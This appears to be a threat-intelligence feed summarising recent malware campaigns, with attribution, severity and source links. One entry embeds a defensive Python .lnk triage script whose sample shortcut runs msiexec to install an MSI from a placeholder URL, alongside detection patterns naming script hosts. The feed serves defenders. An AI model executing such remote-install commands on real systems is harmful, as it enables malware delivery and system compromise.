Researchers at Malware-Traffic-Analysis have documented a January 2026 incident involving a Lumma Stealer infection that progressed into additional malware deployment. The activity began with a Windows installer masquerading as a legitimate application, which unpacked several temporary components, including an AutoIt executable and supporting files used to assemble an AutoIt-compiled Lumma Stealer payload. The resulting script executed credential theft and related data harvesting functions, consistent with known Lumma Stealer behavior. Network analysis showed outbound command-and-control communication followed by the retrieval of further malicious content, indicating secondary payload delivery or loader execution after the initial theft phase. Overall, the sequence reflects a multi-stage information-stealer campaign that abuses legitimate scripting frameworks for evasion, automated execution, and follow-on compromise, posing a data loss risk to Windows environments, particularly within enterprise networks.
Source: https://www.malware-traffic-analysis.net/2026/01/01/index.html
2026-01-05
Kimsuky_USCG_Report_themed_Malware
HIGH
Intel Source:
Dreaming Bluebird
Intel Name:
Kimsuky_USCG_Report_themed_Malware
Date of Scan:
2026-01-05
Impact:
HIGH
Summary:
Researchers at Dreaming Bluebird have identified a new malware campaign attributed to the North Korean threat group Kimsuky, which leverages a fake U.S. Coast Guard inspection report as a lure to target maritime and logistics organizations. The malicious file, disguised as a legitimate PDF, uses multi-stage JavaScript execution with layered Base64 encoding and obfuscation to silently deliver a secondary payload on Windows systems. The script employs ActiveX, ADODB.Stream, and Windows Script Host to write and execute payloads from the ProgramData directory, ultimately invoking PowerShell and DLL execution to establish persistence and command capability. Error handling through silent try/catch loops and the use of legitimate utilities such as certutil and regsvr32 enable stealthy operation and reduce detection likelihood.
Source: https://wezard4u.tistory.com/429681
2026-01-05
VVS_Stealer_Obfuscated_Python_Credential_Theft
MEDIUM
Intel Source:
Unit42
Intel Name:
VVS_Stealer_Obfuscated_Python_Credential_Theft
Date of Scan:
2026-01-05
Impact:
MEDIUM
Summary:
Researchers at Palo Alto Networks Unit 42 have identified a new Python-based information stealer named VVS Stealer, designed to target Discord users and exfiltrate credentials, tokens, and browser data. The malware employs the Pyarmor tool for code obfuscation, leveraging advanced encryption and Byte-Code-to-Compilation (BCC) features to hinder analysis and detection. VVS Stealer has been in active development since early 2025 and is advertised on Telegram as a hacking utility for stealing Discord and browser information. The stealer achieves persistence by copying itself to the Windows Startup directory and uses fake error messages to disguise its operation. Once active, it harvests sensitive data including browser cookies, history, passwords, and Discord tokens before exfiltrating the information via webhooks to attacker-controlled endpoints.
Source: https://unit42.paloaltonetworks.com/vvs-stealer/
2026-01-05
A_Deployment_of_CountLoader_and_ACR_Stealer
MEDIUM
Intel Source:
Cyderes
Intel Name:
A_Deployment_of_CountLoader_and_ACR_Stealer
Date of Scan:
2026-01-05
Impact:
MEDIUM
Summary:
Researchers from Cyderes have uncovered an active malware campaign that leverages cracked-software distribution sites to deliver a malicious loader known as CountLoader (v3.2), which ultimately installs the ACR Stealer. The attack begins when a victim downloads a malicious archive containing a trojanized Python library and a decoy document that provides the password for an embedded ZIP file. When executed, the malicious component uses MSHTA to download and run an obfuscated CountLoader stage. The loader profiles the infected system, establishes persistence through scheduled tasks, and communicates with its C2 infrastructure using custom encoding. After confirming an active C2 server, it retrieves additional instructions and deploys the ACR Stealer payload directly in memory, enabling the theft of credentials and other sensitive data.
Source: https://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader
2026-01-01
EtherRAT_Abuses_Ethereum_for_Fileless_C2
HIGH
Intel Source:
Sysdig
Intel Name:
EtherRAT_Abuses_Ethereum_for_Fileless_C2
Date of Scan:
2026-01-01
Impact:
HIGH
Summary:
Researchers at Sysdig have identified EtherRAT, a newly observed remote access trojan that abuses the Ethereum blockchain for command and control. It is delivered through exploitation of the React2Shell vulnerability in Next.js applications and operates in a fileless manner via Node.js, executing fully in memory to evade disk-based detection, while using smart contract state changes to dynamically resolve active infrastructure for resilient C2 operations. Analysis uncovered five post-compromise modules: system reconnaissance that self-terminates on CIS-region locales; credential and cryptocurrency theft targeting wallet seed phrases, API keys, and cloud credentials; a self-propagating worm that scans and exploits additional vulnerable endpoints across internal and external networks; a web server hijacking component used for traffic redirection and monetization; and an SSH-based persistence mechanism using a hard-coded public key. Although initial assessment suggested a possible DPRK nexus, characteristics such as CIS locale exclusion and monetization-focused behavior align more closely with Russian-speaking threat actor tradecraft, indicating either shared tooling or deliberate false flagging.
Source: https://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2
2025-12-31
BlindEagle_Colombian_Gov_Spearphish_Uses_DCRAT
HIGH
Intel Source:
Zscaler Threatlabz
Intel Name:
BlindEagle_Colombian_Gov_Spearphish_Uses_DCRAT
Date of Scan:
2025-12-31
Impact:
HIGH
Summary:
Researchers at Zscaler ThreatLabz have identified a spear-phishing campaign attributed to the South American threat actor BlindEagle, targeting a Colombian government agency under the Ministry of Commerce, Industry and Tourism (MCIT). The campaign leveraged a compromised internal email account to distribute phishing messages containing an SVG attachment that redirected victims to a fraudulent judicial web portal. From there, victims were deceived into downloading a JavaScript file that initiated a file-less infection chain. This chain executed multiple obfuscated JavaScript stages and PowerShell commands to deploy the Caminho downloader, which ultimately delivered the DCRAT remote access trojan. The attack demonstrated multi-layered obfuscation, in-memory execution, and the use of legitimate services such as Discord for payload hosting. Caminho’s code contained Portuguese elements, suggesting origins within the Brazilian cybercriminal ecosystem.
Source: https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat#indicators-of-compromise--iocs-
2025-12-31
EmEditor_Compromise_Info_Stealing_Supply_Chain_Attack
HIGH
Intel Source:
Qianxin Threat Intelligence Center
Intel Name:
EmEditor_Compromise_Info_Stealing_Supply_Chain_Attack
Date of Scan:
2025-12-31
Impact:
HIGH
Summary:
Researchers at Qianxin Threat Intelligence Center have identified a significant software supply chain compromise impacting the official EmEditor installation packages between December 19 and 22, 2025. The attackers replaced legitimate MSI installers with malicious ones signed by a fake certificate, embedding a PowerShell-based information-stealing payload. Once executed, the malware harvested extensive system and credential data, including operating system details, browser information, VPN configurations, and user credentials across communication and productivity tools. It employed RSA encryption for stolen data and achieved persistence through a malicious Microsoft Edge extension masquerading as a legitimate cloud storage plugin.
Source: https://ti.qianxin.com/blog/articles/emeditor-supply-chain-incident-details-disclosed-en/
2025-12-30
Silver_Fox_India_Tax_Phishing_Valley_RAT
HIGH
Intel Source:
Cloudsek
Intel Name:
Silver_Fox_India_Tax_Phishing_Valley_RAT
Date of Scan:
2025-12-30
Impact:
HIGH
Summary:
CloudSEK reports a targeted phishing campaign attributed to the Chinese Silver Fox APT abusing India Income Tax–themed lures to gain initial access. Rather than deploying an overtly malicious executable, the operation relies on a convincing PDF decoy that redirects victims to download an installer masquerading as legitimate tax-related content. Once launched, the installer abuses a signed third-party binary to sideload a malicious DLL, allowing execution to blend into normal Windows activity. The loader performs anti-debugging and sandbox checks before decrypting and executing payloads entirely in memory. The infection chain culminates in the deployment of Valley RAT, a modular backdoor designed for long-term, low-noise persistence. Valley RAT uses delayed beaconing, protocol switching, and three-tier command-and-control failover to evade detection and blocking. Registry-based storage enables operators to update C2 infrastructure and deploy new plugins without redeploying malware. The campaign’s victimology, infrastructure, and tooling contradict earlier attribution to India-aligned actors and instead align with known Silver Fox tradecraft. The impact is sustained access with capabilities for credential theft, surveillance, and lateral movement.
Source: https://www.cloudsek.com/blog/silver-fox-targeting-india-using-tax-themed-phishing-lures#iocs
2025-12-29
Russian_Espionage_Campaign_Abuses_Viber_Messages
HIGH
Intel Source:
360 Threat Intelligence Center
Intel Name:
Russian_Espionage_Campaign_Abuses_Viber_Messages
Date of Scan:
2025-12-29
Impact:
HIGH
Summary:
Researchers at the 360 Threat Intelligence Center have observed that UAC-0184, also known as Hive0156, a Russian state-aligned cyber-espionage group, is targeting Ukrainian military and government entities through a campaign dubbed "The Dark Side of the Fallen Files." The campaign leverages the Viber messaging platform to deliver malicious ZIP archives containing shortcut files and PowerShell scripts disguised as official Ukrainian parliament correspondence and themed around sensitive military and administrative topics to socially engineer recipients. Once executed, the infection chain retrieves secondary payloads, including HijackLoader, which ultimately deploys the Remcos remote access trojan through a multi-stage process involving DLL side-loading, module stomping, unconventional control flow, and dynamic shellcode decryption to evade detection. HijackLoader performs security product reconnaissance, disables built-in protections, establishes persistence via scheduled tasks, and obscures execution.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507757&idx=1&sn=cf6b118e88395af45a000aae80811264&poc_token=HFVIUmmjA1Fa1PlHP1hqdS28HznjEUfHODrHwWqV
2025-12-29
DNS_Poisoning_Delivers_MgBot
MEDIUM
Intel Source:
Securelist
Intel Name:
DNS_Poisoning_Delivers_MgBot
Date of Scan:
2025-12-29
Impact:
MEDIUM
Summary:
Researchers at Securelist have uncovered a highly targeted campaign by the Evasive Panda threat group, also known as Bronze Highland, Daggerfly, or StormBamboo, that quietly delivers malware by manipulating DNS responses. The campaign relies on victim-specific delivery, with each infection carefully tailored to reduce detection and complicate analysis. The attack impersonates legitimate software updates for widely used applications, allowing it to blend seamlessly into normal user activity. Malware is delivered in multiple stages and proceeds only when specific conditions are met, helping it evade automated defenses. Its components are encrypted, bound to the infected system, and often executed directly in memory or injected into trusted processes to remain hidden. The final payload identified is MgBot, highlighting the group’s focus on long-term remote access and persistent control rather than immediate disruption.
Source: https://securelist.com/evasive-panda-apt/118576/
2025-12-28
A_Deployment_of_CoinMiner_Payloads
MEDIUM
Intel Source:
Asec
Intel Name:
A_Deployment_of_CoinMiner_Payloads
Date of Scan:
2025-12-28
Impact:
MEDIUM
Summary:
Researchers at ASEC have uncovered multiple campaigns that exploit a GeoServer remote code execution vulnerability (CVE-2024-36401) to install cryptocurrency miners on exposed servers. The attackers scan the internet for vulnerable GeoServer deployments rather than targeting specific organizations. Once access is gained, the attackers deploy XMRig-based CoinMiner payloads to hijack system resources for cryptomining. In some cases, they use multi-stage PowerShell and Bash scripts, including droppers delivered via certutil and downloaders that can run payloads directly in memory. The attackers also try to weaken host defenses by adding Windows Defender exclusions and disabling security settings to keep their access longer.
Source: https://asec.ahnlab.com/en/91724/
2025-12-28
npm_Spearphishing_Document_Lures_AiTM
HIGH
Intel Source:
Socket
Intel Name:
npm_Spearphishing_Document_Lures_AiTM
Date of Scan:
2025-12-28
Impact:
HIGH
Summary:
Researchers from the Socket Threat Research Team uncovered a sustained spearphishing campaign that abuses the npm registry as durable hosting for browser-based phishing lures. Instead of compromising developers through malicious dependencies, the actor repurposes npm packages as web-delivered phishing components that execute directly in the victim’s browser. The operation ran for at least five months and involved 27 malicious packages published under multiple aliases. These packages impersonate secure document-sharing portals and Microsoft sign-in pages, with the victim’s email address prefilled to increase credibility. The campaign is highly targeted, focusing on sales and commercial staff at manufacturing, industrial automation, plastics, and healthcare organizations. Once the lure is opened, client-side JavaScript replaces page content and guides the victim through a staged verification flow. Lightweight anti-analysis controls, including bot detection, honeypot form fields, and interaction gating, are used to evade scanners. Credential submission redirects victims to threat actor-controlled infrastructure associated with adversary-in-the-middle techniques. In some cases, the infrastructure overlaps with Evilginx-style patterns capable of stealing session cookies and bypassing MFA. The impact is credential compromise with potential downstream account takeover rather than endpoint malware infection.
Source: https://socket.dev/blog/spearphishing-campaign-abuses-npm-registry?utm_medium=feed
2025-12-27
Tax_Themed_Phish_NSIS_RAT_Fake_ITD
HIGH
Intel Source:
Seqrite
Intel Name:
Tax_Themed_Phish_NSIS_RAT_Fake_ITD
Date of Scan:
2025-12-27
Impact:
HIGH
Summary:
Researchers from Seqrite have uncovered a tax-themed phishing campaign targeting Indian businesses that impersonates the Indian Income Tax Department to deliver a remote access malware payload. The attack begins with spearphishing emails using urgent compliance lures that direct victims to a fraudulent tax portal hosting a malicious ZIP archive. When executed, the archive launches a multi-stage NSIS installer chain that drops and executes a hidden RAT component while attempting to weaken local security controls. The malware establishes persistence by registering a Windows service disguised as a legitimate system protection service. It then performs system reconnaissance, collects host and software information, and registers the infected device with attacker-controlled infrastructure. The implant communicates with its command-and-control servers over multiple ports, enabling remote command execution and follow-on activity. The campaign emphasizes persistence and operational control, posing significant risk to affected organizations through sustained endpoint compromise.
Source: https://www.seqrite.com/blog/indian-income-tax-themed-phishing-campaign-targets-local-businesses/
2025-12-27
Webrat_GitHub_Exploit_Lure_Backdoor
MEDIUM
Intel Source:
Securelist
Intel Name:
Webrat_GitHub_Exploit_Lure_Backdoor
Date of Scan:
2025-12-27
Impact:
MEDIUM
Summary:
Researchers from Securelist have uncovered a Webrat campaign that shifts distribution from game cheats and cracked software to fake exploits hosted on GitHub repositories. Instead of targeting casual users, the attackers now focus on students and inexperienced security professionals by disguising malware as proof-of-concept exploits for high-profile vulnerabilities. The repositories are carefully crafted with AI-generated vulnerability descriptions and realistic mitigation guidance to appear legitimate. Victims are lured into downloading password-protected archives that contain a decoy file alongside a malicious loader. Once executed, the loader escalates privileges, disables Windows Defender, and retrieves the Webrat backdoor from a remote server. The end goal is persistent system access and data theft, including credentials, messaging accounts, and surveillance via keylogging and media capture.
Source: https://securelist.com/webrat-distributed-via-github/118555/
2025-12-26
Phantom_Shuttle_Malicious_Chrome_VPN
HIGH
Intel Source:
Socket
Intel Name:
Phantom_Shuttle_Malicious_Chrome_VPN
Date of Scan:
2025-12-26
Impact:
HIGH
Summary:
Researchers from Socket have uncovered a long-running malicious Chrome extension campaign tracked as Phantom Shuttle that masquerades as a legitimate VPN and network testing tool. The activity targets developers and foreign trade workers through professionally branded Chrome Web Store listings and a paid subscription model that builds trust and reduces suspicion. The extensions abuse Chrome proxy and authentication APIs to silently inject hardcoded credentials, placing victims in an adversary-in-the-middle position and routing traffic through attacker-controlled infrastructure. The report details how the extensions continuously exfiltrate user emails and passwords via periodic heartbeat communications while selectively proxying high-value domains such as cloud services and developer platforms. This operation has remained active since at least 2017, posing significant credential theft and downstream enterprise and supply-chain risk.
Source: https://socket.dev/blog/malicious-chrome-extensions-phantom-shuttle?utm_medium=feed
2025-12-26
EtherRAT_React2Shell_Exploit_Distribution
HIGH
Intel Source:
AhnLab Security Intelligence Center
Intel Name:
EtherRAT_React2Shell_Exploit_Distribution
Date of Scan:
2025-12-26
Impact:
HIGH
Summary:
ASEC reports an active campaign exploiting the React2Shell vulnerability (CVE-2025-55182) to deploy EtherRAT via automated scanning of exposed React/Next.js servers. The multi-stage Node.js infection chain installs a RAT capable of command execution, credential and cryptocurrency theft, SSH key persistence, and propagation. EtherRAT uniquely resolves its C2 through Ethereum smart contract queries, indicating higher operational sophistication. The activity is opportunistic and high impact, enabling persistent access and financial theft.
Source: https://asec.ahnlab.com/en/91658/
2025-12-25
Repeated_IIS_Intrusions_Lead_to_Malware_Access
LOW
Intel Source:
Huntress
Intel Name:
Repeated_IIS_Intrusions_Lead_to_Malware_Access
Date of Scan:
2025-12-25
Impact:
LOW
Summary:
Researchers from Huntress have uncovered three intrusions in which a threat actor repeatedly failed and retried actions until malware execution and persistence partially succeeded. In each case, the activity originated from Microsoft IIS web servers, with commands executed under the IIS worker process. The actor relied on basic but effective techniques, including system enumeration, downloading and launching files using built-in Windows utilities, and repeatedly attempting to run the same payloads after initial failures. In later stages, they attempted to weaken defenses by adding Microsoft Defender exclusions and attempted to establish persistence by creating a Windows service, although some efforts failed due to misconfiguration. The affected victims included a development firm, a manufacturing organization, and an enterprise shared services provider, indicating broad and opportunistic targeting rather than a focus on a specific industry.
Source: https://www.huntress.com/blog/trial-error-typos-malware-attacks-sophisticated
2025-12-25
Shared_Lazarus_Kimsuky_Attack_Infrastructure
HIGH
Intel Source:
Hunt.IO
Intel Name:
Shared_Lazarus_Kimsuky_Attack_Infrastructure
Date of Scan:
2025-12-25
Impact:
HIGH
Summary:
Researchers from Hunt.io and Acronis Threat Research identified a campaign linked to the North Korea–aligned groups Lazarus and Kimsuky by analysing how their infrastructure is reused across operations, rather than focusing on a single malware family. The report shows that the same servers, certificates, ports, and hosting choices appear again and again, revealing consistent operator behavior. The researchers also uncovered open directories exposing credential-stealing tools, repeated use of tunneling and proxy services, and infrastructure that supports remote access and command-and-control activity. The analysis links the Lazarus group to a Linux backdoor called Badcall and its supporting hosting environment, while another finding highlights open directories filled with mixed toolsets for credential theft, data exfiltration, and remote administration. Overall, the activity suggests the actors can quickly scale and redeploy proxy nodes across multiple VPS providers with minimal effort.
Source: https://hunt.io/blog/dprk-lazarus-kimsuky-infrastructure-uncovered
2025-12-24
MacSync_Stealer
MEDIUM
Intel Source:
Jamf
Intel Name:
MacSync_Stealer
Date of Scan:
2025-12-24
Impact:
MEDIUM
Summary:
Researchers from Jamf Threat Labs have uncovered a MacSync Stealer campaign that marks a shift from earlier user-driven infection methods to a quieter, more automated approach on macOS. Instead of relying on ClickFix tricks or forcing users to paste commands into Terminal, the attackers now distribute a code-signed and notarized Swift application inside a disk image that looks legitimate and includes decoy content to appear trustworthy. Once launched, the app silently fetches an encoded script from a remote server and runs it using a built-in helper, with no further user interaction. The malware checks its environment and internet connectivity before proceeding, limits how often it can run, and lightly validates downloaded content to avoid errors and reduce suspicion. By minimizing warnings and user prompts, the campaign supports stealthy execution, with the end goal of infostealer activity such as stealing credentials and sensitive data from macOS systems.
Source: https://www.jamf.com/blog/macsync-stealer-evolution-code-signed-swift-malware-analysis/
2025-12-24
ConsentFix_A_New_Phishing_Attack_Technique
MEDIUM
Intel Source:
Push Security
Intel Name:
ConsentFix_A_New_Phishing_Attack_Technique
Date of Scan:
2025-12-24
Impact:
MEDIUM
Summary:
Researchers at Push Security have identified ConsentFix, a browser-native phishing technique that abuses OAuth consent flows combined with ClickFix-style user interaction to compromise Microsoft cloud accounts without requiring passwords or MFA prompts. Victims are lured via search results to compromised or malicious websites that masquerade as routine security checks and guide users to complete a legitimate Microsoft sign-in in a separate tab. By tricking users into copying authorization data from the browser address bar back into the lure page, attackers can redeem OAuth tokens using Azure command-line tooling. This enables control over the victim’s Microsoft identity and associated resources while relying solely on standard cloud application workflows. The attack operates entirely within the browser, evades many endpoint and email-based defenses, and uses selective targeting and anti-analysis measures to reduce detection.
Source: https://pushsecurity.com/blog/consentfix#id-recommendations_id-iocs
2025-12-24
Ink_Dragon_Espionage_Campaign
HIGH
Intel Source:
CheckPoint
Intel Name:
Ink_Dragon_Espionage_Campaign
Date of Scan:
2025-12-24
Impact:
HIGH
Summary:
Check Point researchers have identified an espionage campaign conducted by the PRC-aligned threat actor Ink Dragon, also tracked as CL-STA-0049, Earth Alux, and REF7707. The group primarily targets government, telecommunications, and other public-sector organizations across Southeast Asia, South America, Africa, and Europe. Initial access is typically achieved by exploiting ASP.NET ViewState deserialization vulnerabilities on exposed IIS and SharePoint servers, as well as the SharePoint ToolShell vulnerability, enabling remote code execution without user interaction. After gaining access, the actors rapidly escalate privileges, harvest credentials and authentication tokens, and pivot laterally by abusing administrative RDP sessions. They deploy ShadowPad and FinalDraft malware to establish C2, move laterally across Windows environments, and exfiltrate sensitive data. Throughout the campaign, Ink Dragon consistently abuses legitimate digital signatures and disguises malicious binaries as native Windows components to evade detection and blend into normal system activity.
Source: https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/
2025-12-23
Targeted_Email_Campaigns
MEDIUM
Intel Source:
Cyble
Intel Name:
Targeted_Email_Campaigns
Date of Scan:
2025-12-23
Impact:
MEDIUM
Summary:
Researchers from Cyble have uncovered a targeted email campaign that uses a multi-stage loader to deliver malware, including remote access trojans and information stealers. The attack begins with spear-phishing emails disguised as purchase order communications, in which malicious attachments trigger scripts that download and execute additional components. To evade detection, the loader employs heavy obfuscation, execution delays, and in-memory loading to minimize forensic artifacts on the system. The campaign also conceals malicious code within image files using steganography and weaponizes legitimate open-source libraries by appending malicious code while keeping their expected functionality. The final payload injects itself into a trusted Windows process to blend in with legitimate activity and focuses on stealing credentials and sensitive data. Overall, the campaign primarily targets industrial organizations, with the goal of harvesting sensitive information and credentials for further compromise.
Source: https://cyble.com/blog/stealth-in-layers-unmasking-loader-in-targeted-email-campaigns/
2025-12-23
SantaStealer_Emerging_Infostealer_Malware
MEDIUM
Intel Source:
Rapid7 Labs
Intel Name:
SantaStealer_Emerging_Infostealer_Malware
Date of Scan:
2025-12-23
Impact:
MEDIUM
Summary:
Researchers at Rapid7 Labs have identified SantaStealer, a newly emerging infostealer malware being actively marketed on underground forums and Telegram channels as part of a growing infostealer-as-a-service ecosystem. The malware is currently under development and offered in subscription-based tiers that advertise advanced anti-analysis and stealth features, although technical examination suggests these claims are not yet fully realized. SantaStealer is designed to collect credentials, browser data, crypto wallet information, and system artifacts from Windows environments, employing techniques such as reflective DLL loading, in-memory execution, and the ChaCha20 encryption algorithm to obfuscate its activity. The stealer’s modular framework and web-based control panel allow operators to customize payloads, manage infected hosts, and test files for antivirus detection. Uniquely, SantaStealer provides an option to exclude victims in the Commonwealth of Independent States (CIS), indicating targeting preferences consistent with actors from Russian-speaking regions. The malware’s use of a web panel hosted under a .su domain, coupled with its rapid feature development and commercialization, points to an organized criminal operation seeking to capture market share within the commodity infostealer landscape.
Source: https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums/
2025-12-22
LongNosedGoblin_Targets_Asian_Governments
HIGH
Intel Source:
ESET
Intel Name:
LongNosedGoblin_Targets_Asian_Governments
Date of Scan:
2025-12-22
Impact:
HIGH
Summary:
Researchers at ESET identified a previously undocumented, China-aligned advanced persistent threat group named LongNosedGoblin, active since at least September 2023 and focused on cyberespionage against government institutions in Southeast Asia and Japan. The group seeks to exfiltrate sensitive information through sustained campaigns, with a distinctive tactic of abusing Windows Group Policy to enable lateral movement and large-scale malware deployment across compromised environments. Its toolkit consists mainly of custom C# and .NET malware, including components for browser history collection, multi-stage backdoor access, credential and data theft via cloud platforms, PowerShell-based payload delivery, and encrypted keystroke logging, supported by advanced execution methods such as AppDomainManager injection and AMSI bypass for evasion. Investigations also revealed the use of living-off-the-land binaries and execution guardrails to restrict activity to intended victims, along with indications of possible tool sharing with other China-aligned groups, despite clear differences in tactics and techniques. Activity observed again in September 2025 showed continued use of similar methods and abuse of common cloud services as covert command-and-control channels, reinforcing assessments that LongNosedGoblin operates with moderate to high sophistication in support of long-term intelligence collection tied to regional government affairs.
Source: https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/
2025-12-22
Arkanix_Stealer_Discord_Infostealer
HIGH
Intel Source:
Dexpose
Intel Name:
Arkanix_Stealer_Discord_Infostealer
Date of Scan:
2025-12-22
Impact:
HIGH
Summary:
Researchers from DeXpose have identified an actively developed infostealer campaign centered around Arkanix Stealer, which is primarily marketed and distributed through Discord and underground forums. The malware is disguised as legitimate tools, enticing users to execute the payload on Windows systems. Once launched, Arkanix bypasses core Windows security controls, including AMSI and ETW, using in-memory patching to evade detection. It employs strong anti-analysis and anti-VM checks to limit execution in sandboxed environments. The stealer then harvests a wide range of sensitive data, including browser credentials, cryptocurrency wallets, VPN accounts, Discord tokens, WiFi credentials, and system metadata. Collected data is compressed and exfiltrated to attacker-controlled infrastructure hidden behind Cloudflare, enabling scalable and stealthy credential theft operations.
Source: https://www.dexpose.io/deep-dive-into-arkanix-stealer-and-its-infrastructure/
2025-12-21
Paper_Werewolf_Campaign
MEDIUM
Intel Source:
Intezer
Intel Name:
Paper_Werewolf_Campaign
Date of Scan:
2025-12-21
Impact:
MEDIUM
Summary:
Researchers from Intezer have uncovered a Paper Werewolf (also known as GOFFEE) campaign that leverages malicious Excel XLL add-ins and AI-generated decoy documents to deploy a new backdoor, dubbed EchoGather. The operation relies on social engineering and user interaction, with execution techniques designed to delay activity, evade sandbox detection, and minimize visible indicators of compromise. Once established, EchoGather collects basic system and user information and maintains periodic communication with its C2 servers over encrypted web traffic. The backdoor also supports remote command execution and file exfiltration. The decoy content is crafted to resemble official Russian-language documents and invitations, and the identified victims include Russian organizations associated with defense and industrial sectors, indicating an intelligence-gathering campaign.
Source: https://intezer.com/blog/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/
2025-12-20
APT36_LNK_Based_Malware_Campaign
MEDIUM
Intel Source:
Cyfirma
Intel Name:
APT36_LNK_Based_Malware_Campaign
Date of Scan:
2025-12-20
Impact:
MEDIUM
Summary:
Researchers from Cyfirma have uncovered a targeted malware campaign attributed to APT36 that uses social engineering to trick users into opening a malicious Windows shortcut disguised as a PDF advisory. The attack abuses default Windows behavior that hides file extensions, making the shortcut appear benign. When executed, it silently runs an obfuscated command that downloads and installs a remote MSI file. This MSI acts as a loader for a multi-stage infection chain, deploying a .NET-based loader along with additional malicious components. To avoid suspicion, a decoy document is displayed while the malware executes in the background. The payload establishes persistence through registry modifications, enabling it to survive system reboots, and provides C2 functionality for remote command execution. It also collects basic system information, such as installed antivirus products, and performs checks to evade virtualized or sandboxed environments.
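One way to triage shortcut lures of the kind described above, as an added example that is not Cyfirma's code: a minimal parser for the parts of a Windows .lnk that matter here (target path, arguments, icon), following the public MS-SHLLINK layout, plus a constructed sample shortcut so the block runs offline. The lure file name, target path, icon and URL are hypothetical placeholders, not indicators from the report.

```python
"""Added example, not Cyfirma's code: parse the StringData of a Windows shortcut and
flag the traits of the lure described above (document-looking name with a hidden .lnk
extension, msiexec pulling an MSI over HTTP, an icon borrowed from another program).
Layout follows MS-SHLLINK: a 76-byte ShellLinkHeader whose LinkFlags select the optional
LinkTargetIDList and LinkInfo structures, then StringData fields in fixed order.
All names, paths and the URL below are placeholders constructed for the demo.
"""
import ntpath
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shortcut (target path, arguments, icon, ...)."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:        # skip the IDList: 2-byte size + items
        idlist_size, = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:                  # skip LinkInfo: its first field is its size
        link_info_size, = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    fields = {}
    for flag, name in STRING_FIELDS:           # each present field: uint16 char count + chars
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


DOCUMENT_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg")
COMMAND_CHECKS = (
    ("remote MSI install via msiexec", re.compile(r'msiexec(?:\.exe)?.*\s[/-]i\s+"?https?://', re.I)),
    ("script host or LOLBin as target",
     re.compile(r"\b(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(?:\.exe)?\b", re.I)),
)


def assess_shortcut(filename: str, data: bytes) -> list[str]:
    """Triage one .lnk: double extension, suspicious command line, borrowed icon."""
    findings = []
    lower = filename.lower()
    if lower.endswith(".lnk") and lower[:-4].endswith(DOCUMENT_EXTENSIONS):
        findings.append("double extension: document name hiding .lnk (Explorer hides it by default)")
    fields = parse_lnk(data)
    target = fields.get("relative_path", "")
    command_line = f"{target} {fields.get('arguments', '')}"
    for label, pattern in COMMAND_CHECKS:
        if pattern.search(command_line):
            findings.append(f"command line: {label}")
    icon = fields.get("icon_location", "")
    if icon and ntpath.basename(icon).lower() != ntpath.basename(target).lower():
        findings.append(f"icon borrowed from {icon!r} while target is {target!r}")
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Construct a minimal Unicode shortcut (no IDList, no LinkInfo) for the demo."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    # header: size, CLSID, flags, attrs, 3 FILETIMEs, file size, icon index, SW_SHOWNORMAL, hotkey, reserved
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments) + string_data(icon_location)


SAMPLE_NAME = "Security_Advisory.pdf.lnk"   # hypothetical lure name
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\msiexec.exe",
    "/i http://example.invalid/update.msi /qn",   # placeholder URL, not an indicator
    r"%SystemRoot%\System32\shell32.dll",
)

if __name__ == "__main__":
    print(parse_lnk(SAMPLE_LNK))
    for finding in assess_shortcut(SAMPLE_NAME, SAMPLE_LNK):
        print("-", finding)
```

Real shortcuts usually carry an IDList and LinkInfo, which the parser skips by their self-declared sizes; padding in the arguments field is a common trick to push the real command out of the Properties dialog, so check the length of `arguments` as well as its content.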
Source: https://www.cyfirma.com/research/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/
2025-12-20
Deployment_of_StealC_and_Qilin_Payloads_Through_Clickfix
MEDIUM
Intel Source:
Sophos
Intel Name:
Deployment_of_StealC_and_Qilin_Payloads_Through_Clickfix
Date of Scan:
2025-12-20
Impact:
